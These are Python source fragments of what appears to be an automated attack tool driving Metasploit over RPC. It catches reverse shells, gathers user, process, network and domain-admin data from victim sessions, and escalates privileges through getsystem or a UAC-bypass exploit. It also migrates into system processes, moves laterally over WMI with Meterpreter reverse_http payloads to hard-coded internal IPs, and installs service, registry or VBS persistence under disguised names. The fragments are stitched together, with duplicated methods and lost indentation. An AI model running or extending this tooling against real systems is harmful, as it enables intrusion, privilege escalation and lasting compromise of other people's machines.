def gatherWhoAmI(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering whoami data from session " + sessionInput +".")
try:
whoami_input = []
whoami = msfclient.client.sessions.session(sessionInput).run_psh_cmd("whoami", timeout=30)
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(session_id=sessionInput).first()
if recon:
whoami_input = whoami.splitlines()
recon.whoami = whoami_input[1]
else:
recon = Recon()
recon.session_id = sessionInput
recon._id = sessionInput
session.recon_id.append(recon.session_id)
for lines in whoami.splitlines():
if lines == '':
pass
else:
recon.whoami = lines
recon.save()
session.save()
EventUtils.settingEvent(self, "whoami data for session " +sessionInput+ ": " +recon.whoami+".")
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
logger.info(msg)
print("There was an error!")
pass
def __init__(self, msfclient):
self.msfclient = msfclient
# starting mongo
global_init()
# clearing sessions for new sessions
svc.deleteSessions()
print("[!]Starting Automation...")
EventUtils.settingEvent(self, "Starting automation!")
msfrpcdHandler()
if self.msfclient.connect() is False:
sys.exit()
sessionMod(self.msfclient).sessionPrint() # NEED TO IMPROVE THIS
session = Session.objects()
if session:
sessionMod(self.msfclient).activeSessionController()
else:
print("[!]Running exploit: exploit/multi/handler")
exploit = self.msfclient.client.modules.use('exploit', 'exploit/multi/handler')
time.sleep(5)
exploit['ExitOnSession'] = False
time.sleep(2)
randomPayload = random.choice(self.choose_payload)
print("[!]Using payload: ", randomPayload)
_payload = self.msfclient.client.modules.use('payload', randomPayload)
time.sleep(2)
_payload['LHOST'] = '0.0.0.0'
_payload['LPORT'] = '4444'
time.sleep(5)
exploit.execute(payload=_payload)
print("[!]Executing exploit on port ", _payload['LPORT'])
time.sleep(10)
sessionMod(self.msfclient).activeSessionController()
def lmove(self):
if self.knownIP is None:
print("Ran out of IP!")
else:
EventUtils.settingEvent(
self, "Using WMI to move to a different client...")
selectedIP = random.choice(self.knownIP)
selectedPort = random.choice(self.ports)
lmove_exploit = ['windows/local/wmi']
exploit = self.msfclient.client.modules.use(
'exploit', lmove_exploit[0])
_payload = self.msfclient.client.modules.use(
'payload', 'windows/meterpreter/reverse_http')
exploit['RHOSTS'] = selectedIP
exploit['SESSION'] = int(self.sessionInput)
_payload['LHOST'] = get_my_ip()
_payload['LPORT'] = selectedPort
EventUtils.settingEvent(self,
"Trying to move into " + selectedIP + ".")
print("[!] Trying to move into " + selectedIP + " on port " +
str(selectedPort) + ".")
# exploit.execute(payload=_payload)
# exploitdata = self.msfclient.client.consoles.console(self.cid).read()
print(
self.msfclient.client.consoles.console(
self.cid).run_module_with_output(exploit,
payload=_payload))
self.knownIP.remove(selectedIP)
self.ports.remove(selectedPort)
self.usedIP.append(selectedIP)
self.usedPorts.append(selectedPort)
def gatherPID(self, msfclient, sessionInput):
try:
EventUtils.settingEvent(self, "Gathering list of PID from session " + sessionInput + ".")
pid_list = []
desc_pid = ['PID', 'Name']
run_ps = msfclient.client.sessions.session(sessionInput).run_with_output('ps', timeout=30)
time.sleep(8)
listofPID = run_ps.splitlines()
for line in listofPID:
info = line.split()
if not line:
pass
elif 'PID' in line:
pass
elif '=' in line:
pass
elif 'Proces' in line:
pass
elif '---' in line:
pass
else:
temp_list = [info[0], info[2]]
pid_mapped = dict(zip(desc_pid, temp_list))
pid_list.append(pid_mapped)
return pid_list
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
logger.info(msg)
print(msg)
pass
def gatherFiles(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering file info from session " + sessionInput + ".")
try:
desc_files = ['Mode', 'Size', 'Type', 'Last', 'Modified', 'TimeZone', 'Name']
listofFiles = msfclient.client.sessions.session(sessionInput).run_with_output('ls', timeout=30).splitlines()
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(_id=sessionInput).first()
if not recon:
Reconnaissance.gatherPWD(self, msfclient, sessionInput)
recon = Recon.objects(_id=sessionInput).first()
directory = Recon.objects().filter(directory__dir_name=recon.pwd)
if directory:
for r in directory:
for d in r.directory:
if not d.gathered:
d.gathered = True
for f in listofFiles:
file = self.parseFileData(f)
if not file:
pass
else:
files_mapped = dict(zip(desc_files, file))
d.files.append(files_mapped)
r.save()
else:
current_files = []
for _dict in d.files:
current_files.append(_dict['Name'])
for f in listofFiles:
file = self.parseFileData(f)
if not file:
pass
else:
#First check if the file is in the dict
if file[6] in current_files:
for found_dict in d.files:
if file[6]==found_dict['Name']:
self.checkingFileChanges(file, found_dict)
else:
pass
else:
#if not, add the new file info in the dict
files_mapped = dict(zip(desc_files, file))
d.files.append(files_mapped)
r.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
logger.info(msg)
print(msg)
pass
def changeWallpaper(self, msfclient, sessionInput):
EventUtils.settingEvent(
self, "Changing wallpapper on session " + sessionInput + ".")
path = os.path.dirname(__file__)
cw = msfclient.client.modules.use('post', 'multi/manage/set_wallpaper')
cw['SESSION'] = int(sessionInput)
cw['WALLPAPER_FILE'] = path + '/magicword.jpg'
cw.execute()
time.sleep(5)
def gatherDomain(self, msfclient, sessionInput):
try:
EventUtils.settingEvent(self, "Gathering domain info from session " + sessionInput + ".")
domain = ""
user_list = {'User': '******', 'IP': '0.0.0.0'}
domain_user = []
post = msfclient.client.modules.use('post', 'windows/gather/enum_domain')
post['SESSION'] = sessionInput
cid = msfclient.console
run_enum_domain = msfclient.client.consoles.console(cid).run_module_with_output(post)
for line in run_enum_domain.splitlines():
if '[-]' in line:
print("[-] Issue gathering domain info!")
else:
if line.find("Domain: ") != -1:
domain = line.split("Domain: ",1)[1]
elif line.find("Controller: ") != -1:
domain_user_info = line.split("Controller: ", 1)[1].split()
user_list['User'] = domain_user_info[0].upper()
user_list['IP'] = domain_user_info[2].replace(')', '')
else:
print("[-] Issue gathering domain info!")
post = msfclient.client.modules.use('post', 'windows/gather/enum_domain_group_users')
post['GROUP'] = 'domain admins'
post['SESSION'] = sessionInput
run_enum_domain_group_users = msfclient.consoles.console(cid).run_module_with_output(post)
for line in run_enum_domain_group_users.splitlines():
if domain in line:
users = line.split('\\')[1]
if 'not' in users:
pass
else:
domain_user.append(users)
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(_id=sessionInput).first()
if recon is None:
recon = Recon()
recon_domain = ReconDomain()
recon_domain.domain = domain
recon_domain.domain_controller = user_list
recon_domain.domain_user = domain_user
recon.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
print(msg)
def getElevated(self, msfclient, sessionInput):
try:
EventUtils.settingEvent(
self, "Trying to get elevated on session" + sessionInput + ".")
session = Session.objects(_id=sessionInput).first()
if session:
esc = EscalationData.objects(_id=sessionInput).first()
if esc:
EventUtils.settingEvent(
self,
"[" + sessionInput + "] You currently own the system.")
print("[!]You own the system.")
else:
EventUtils.settingEvent(
self, "[" + sessionInput +
"] Attempting to elevate via getsystem...")
esc = EscalationData()
getsystem = msfclient.client.sessions.session(
sessionInput).run_with_output(
'getsystem').splitlines()
if '[-]' in getsystem[0]:
EventUtils.settingEvent(
self, "[" + sessionInput +
"] Attempting bypassuac_comijack...")
print(
"[!]Failed getsystem. Trying bypassuac_comijack..."
)
exploit = msfclient.client.modules.use(
'exploit',
'exploit/windows/local/bypassuac_comhijack')
exploit['SESSION'] = int(sessionInput)
payload = msfclient.client.modules.use(
'payload', 'windows/x64/meterpreter/reverse_https')
payload['LHOST'] = "0.0.0.0"
payload['LPORT'] = 4444
exploit.execute(payload=payload)
esc.getsystem = True
session.esc_id.append(esc._id)
else:
EventUtils.settingEvent(
self, "[" + sessionInput +
"] You currently own the system.")
print("[+]Gained system. Start gaining info")
session.esc_id.append(esc._id)
esc.getsystem = True
esc.save()
session.save()
except Exception as msg:
print(msg)
pass
def moveIntoProcess(self, msfclient, sessionInput):
EventUtils.settingEvent(
self, "Moving into a different process on " + sessionInput + ".")
good_process = ['OneDrive.exe', 'spoolsv.exe', 'explorer.exe']
pid = []
list_pid = Reconnaissance.gatherPID(self, msfclient, sessionInput)
for p in list_pid:
if p['Name'] in good_process:
pid.append(p['PID'])
chosen_pid = random.choice(pid)
print(f"Chosen {chosen_pid} to migrate into")
e = msfclient.client.sessions.session(sessionInput).run_with_output(
f'migrate {chosen_pid}')
time.sleep(10)
def lmove(self, sessionInput):
EventUtils.settingEvent(self,
"Using WMI to move to a different client...")
lmove_exploit = ['windows/local/wmi']
exploit = self.msfclient.modules.use('exploit', lmove_exploit[0])
_payload = self.msfclient.modules.use(
'payload', 'windows/x64/meterpreter/reverse_http')
exploit['RHOSTS'] = '192.168.2.119' #this needs to be dynamic
exploit['SESSION'] = sessionInput
_payload[
'LHOST'] = '192.168.2.108' #this needs to be dynamic or setup by a config file
_payload[
'LPORT'] = 6666 #this needs to be dynamic or create a table of ports somewhere
#jobs and sessions need to be logged and queried in order to check
exploit.execute(payload=_payload)
def gatherInstalledPrograms(self, msfclient, sessionInput):
try:
EventUtils.settingEvent(self, "Gathering installed program info from session " + sessionInput +".")
program_desc = ['Name', 'Version']
current_programs = []
session = Session.objects(_id=sessionInput).first()
msfclient.client.sessions.session(sessionInput).write('run post/windows/gather/enum_applications')
time.sleep(10)
run_post = msfclient.client.sessions.session(sessionInput).read()
listofPrograms = run_post.splitlines()
if session:
recon = Recon.objects(_id=sessionInput).first()
if recon is None:
recon = Recon()
recon._id = sessionInput
recon.session_id = sessionInput
session.recon_id.append(recon.session_id)
else:
for p in listofPrograms:
program = self.parseProgramList(p)
if not program:
pass
else:
programs_mapped = dict(zip(program_desc, program))
if not recon.gathered_programs:
recon.installedprg.append(programs_mapped)
else:
for list in recon.installedprg:
for key, value in list.items():
if key in programs_mapped:
pass
else:
recon.installedprg.append(programs_mapped)
recon.gathered_programs = True
recon.save()
session.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
logger.info(msg)
print(msg)
pass
def gatherCurrentAdmin(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering current admin on session " + sessionInput + ".")
try:
admin = msfclient.client.sessions.session(sessionInput).run_psh_cmd("net sessions", timeout=30)
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(session_id=sessionInput).first()
if recon:
for lines in admin.splitlines():
if not 'Access is denied.' in lines:
recon.isAdmin = True
else:
recon.isAdmin = False
else:
recon = Recon()
recon.session_id = sessionInput
recon._id = sessionInput
session.recon_id.append(recon.session_id)
for lines in admin.splitlines():
if not 'Access is denied.' in lines:
EventUtils.settingEvent(self, "Session "+sessionInput+" is admin.")
recon.isAdmin = True
else:
EventUtils.settingEvent(self, "Session "+sessionInput+" is not admin.")
recon.isAdmin = False
recon.save()
session.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
def gatherNetwork(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering network info on session " + sessionInput + ".")
try:
session = Session.objects(_id=sessionInput).first()
ip = msfclient.client.sessions.session(sessionInput).run_psh_cmd("ipconfig /all", timeout=30)
if session:
recon = Recon.objects(session_id=sessionInput).first()
if recon:
self.parseIPData(recon, ip)
else:
recon = Recon()
recon.session_id = sessionInput
recon._id = sessionInput
session.recon_id.append(recon.session_id)
self.parseIPData(recon, ip)
recon.save()
session.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
def gatherPWD(self, msfclient, sessionInput):
EventUtils.settingEvent(self, "Gathering pwd from session " + sessionInput + ".")
try:
current_pwd = msfclient.client.sessions.session(sessionInput).run_with_output('pwd', timeout=30)
session = Session.objects(_id=sessionInput).first()
if session:
recon = Recon.objects(session_id=sessionInput).first()
if recon:
if recon.pwd == current_pwd:
pass
else:
recon.pwd = current_pwd
reconfiles = ReconFiles()
reconfiles.dir_name = current_pwd
recon.directory.append(reconfiles)
else:
recon = Recon()
recon.session_id = sessionInput
recon._id = sessionInput
session.recon_id.append(recon.session_id)
recon.pwd = current_pwd
reconfiles = ReconFiles()
reconfiles.dir_name = current_pwd
recon.directory.append(reconfiles)
recon.save()
session.save()
except MsfError:
print(f"[!]Session {sessionInput} threw timeout error.")
print("[!]Killing session...")
msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
time.sleep(10)
pass
except Exception as msg:
logger.info(msg)
print("There was an error!")
pass
def persistence_module(self, sessionInput):
EventUtils.settingEvent(self,
"Setting persistence on " + sessionInput + ".")
persistence_exploits = [
'windows/local/persistence_service',
'windows/local/registry_persistence', 'windows/local/persistence'
]
chosen_persistence = persistence_exploits[random.randint(0, 2)]
exploit = self.msfclient.modules.use('exploit', chosen_persistence)
if 'service' in chosen_persistence:
EventUtils.settingEvent(
self,
"[" + sessionInput + "]Setting up persistence in service " +
self.final_service_host + ".")
exploit['SERVICE_DESCRIPTION'] = 'Service Host'
exploit['SERVICE_NAME'] = self.final_service_host
exploit['RETRY'] = random.randint(10, 15)
if 'registry' in chosen_persistence:
EventUtils.settingEvent(
self,
"[" + sessionInput + "]Setting up persistence in registry.")
exploit['BLOB_REG_KEY'] = random.choice(self.BLOB_KEY)
exploit['BLOB_REG_NAME'] = random.choice(self.REGISTRY_NAME)
exploit['RUN_NAME'] = random.choice(self.REGISTRY_NAME)
exploit['SLEEP_TIME'] = self.SLEEP
if persistence_exploits[2] == chosen_persistence:
EventUtils.settingEvent(
self, "[" + sessionInput + "]Setting up persistence locally.")
exploit['EXE_NAME'] = random.choice(self.EXE_NAME)
exploit['PATH'] = random.choice(self.COMP_PATH)
exploit['VBS_NAME'] = random.choice(self.VBS_NAME)
_payload = self.msfclient.modules.use(
'payload', 'windows/meterpreter/reverse_http')
exploit['SESSION'] = sessionInput
_payload[
'LHOST'] = "192.168.130.1" # please change this to the correct machine
_payload[
'LPORT'] = 8080 # need to change this when switching to different machines
# also need to track it to make sure im not butting heads with anything
exploit.execute(payload=_payload)
def openAlertBox(self, msfclient, sessionInput):
EventUtils.settingEvent(
self, "Sending alertbox to session " + sessionInput + ".")
msfclient.client.sessions.session('1').run_shell_cmd_with_output(
'@powershell.exe -ExecutionPolicy Bypass -Command \"[System.Reflection.Assembly]::LoadWithPartialName(\'System.Windows.Forms\'); [System.Windows.Forms.MessageBox]::Show(\'We are proceeding with next step.\')\"',
end_strs=None)
def activeSessionController(self):
'''
Loops through sending commands to random sessions that are available through dumping and reading the json file.
TODO:
Adding a way to better handle dying connections.
'''
try:
g = True
sessionList = []
sessionsGathered = []
latmov = None
infoGathered = False
while g == True:
try:
while infoGathered == True:
print("[!]Waiting for new session...")
self.dumpSession()
dumpedSession = self.retrieveSession()
for s_id in dumpedSession:
if not s_id in sessionsGathered:
EventUtils.settingEvent(
self, "Found new session: " + s_id)
sessionList.append(s_id)
infoGathered = False
if infoGathered == True:
latmov.lmove()
time.sleep(5)
if not sessionList:
self.dumpSession()
dumpedSession = self.retrieveSession()
for s_id in dumpedSession:
sessionList.append(s_id)
while not sessionList:
print(
"\n[!]No sessions. Waiting for sessions...\n")
time.sleep(5)
self.dumpSession()
dumpedSession = self.retrieveSession()
for s_id in dumpedSession:
sessionList.append(s_id)
else:
for avail in sessionList:
print(f"[+]Session {avail} ready!")
EventUtils.settingEvent(self, "Selected: " + avail)
print(f'[+]Selected session {avail}')
recon = Reconnaissance()
search = searchFiles(self.msfclient)
# print('Gather is currenty working directory')
# recon.gatherPWD(self.msfclient, avail)
# time.sleep(5)
# print('Gathering files in directory')
# recon.gatherFiles(self.msfclient, avail)
# time.sleep(5)
# print('Gathering session network')
# recon.gatherNetwork(self.msfclient, avail)
# time.sleep(5)
# print('Gathering current user')
# recon.gatherWhoAmI(self.msfclient, avail)
# time.sleep(5)
print('Gather if user is Admin')
recon.gatherCurrentAdmin(self.msfclient, avail)
time.sleep(5)
# print('Gathering installed programs')
# recon.gatherInstalledPrograms(self.msfclient, avail)
# time.sleep(5)
# print('Checking for files...')
# search.searchencrypt(avail)
sessionsGathered.append(avail)
sessionList.remove(avail)
if latmov == None:
latmov = LateralMovement(self.msfclient, avail)
latmov.lmove()
time.sleep(4)
# check_error = _output.split(" ")
# if check_error[0] == '[-]':
# print(f"[!]Session {selectedSession} threw timeout error.")
# print("[!]Killing session...")
# self.msfclient.client.consoles.console(self.msfclient.console).write(f'sessions -k {selectedSession}')
# time.sleep(10)
if not sessionList:
print(
"[!]All info gathered! Waiting for new session...")
EventUtils.settingEvent(
self,
"All info gathered, waiting for new session.")
infoGathered = True
pass
except KeyboardInterrupt:
exit = input("[+]Would you like to exit y/n: ").upper()
if exit == 'Y':
return False
elif exit == 'N':
return True
except MsfError:
print(f"[!]Session {avail} threw timeout error.")
print("[!]Killing session...")
self.msfclient.client.consoles.console(
self.msfclient.console).write(f'sessions -k {avail}')
time.sleep(10)
continue
except Exception as msg:
logger.info(msg)
print(msg)
pass